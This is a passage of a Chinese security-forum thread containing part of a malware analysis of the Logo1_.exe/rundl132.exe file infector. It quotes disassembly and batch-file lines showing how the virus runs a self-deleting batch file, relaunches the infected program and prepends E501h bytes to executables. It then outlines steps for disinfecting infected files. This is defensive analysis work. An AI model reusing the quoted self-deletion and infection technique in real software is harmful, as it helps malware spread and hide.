"C:\Documents and Settings\huyuytyt\桌面\病毒\MdnPacker.exe.exe" goto try2 "C:\Documents and Settings\huyuytyt\桌面\病毒\MdnPacker.exe" :try2 del "C:\DOCUME~1\huyuytyt\LOCALS~1\Temp\$$a35.bat" 就是试图删掉自身,将生成的文件重新命名回来,接着运行,最后删除批处理本身 00408272 E8 81C6FFFF call 004048F8 ; 将生成的内容写入批处理 00408277 57 push edi 00408278 E8 BFBFFFFF call 0040423C ; jmp 到 kernel32.CloseHandle 。。。。。。。。。。。。。。 004082D9 50 push eax 004082DA 6A 00 push 0 004082DC 6A 20 push 20 004082DE 6A FF push -1 004082E0 6A 00 push 0 004082E2 6A 00 push 0 004082E4 8B45 E8 mov eax, dword ptr [ebp-18] 004082E7 E8 1CB2FFFF call 00403508 004082EC 50 push eax 004082ED 6A 00 push 0 004082EF E8 78BFFFFF call 0040426C ; jmp 到 kernel32.CreateProcessA //运行这个批处理 。。。。。。。。。。。 0040830E E8 C1600000 call 0040E3D4 { 。。。。。。。。。。 0040E41B 50 push eax 0040E41C 6A 00 push 0 0040E41E 6A 00 push 0 0040E420 6A 20 push 20 0040E422 6A FF push -1 0040E424 6A 00 push 0 0040E426 6A 00 push 0 0040E428 8B45 FC mov eax, dword ptr [ebp-4] 0040E42B E8 D850FFFF call 00403508 0040E430 50 push eax 0040E431 6A 00 push 0 0040E433 E8 345EFFFF call 0040426C ; jmp 到 kernel32.CreateProcessA //运行Logo1_.exe } 到这里,这个病毒基本上就分析完了。。。现在我们知道了Logo1_.exe跟rundl132.exe是同一个程序,他们都是被感染程序的前E501字节写入 的。。 下面我给出自己的恢复被感染程序编写的思路: 1。查找所有的EXE文件 2.将文件指针移动到E501h处,读取文件大小-E501字节内容,写进文件"程序原来的名字+.exe" 3.删除掉原来的程序 4.将"程序原来的名字+.exe"重新命名为"程序原来的名字"
作者:
ming600
时间:
2007-2-3 20:41
标题:
[转帖]病毒分析日记(一)
你对解密也挺精通呀,佩服
欢迎光临 黑色海岸线论坛 (http://bbs.thysea.com/)
Powered by Discuz! 7.2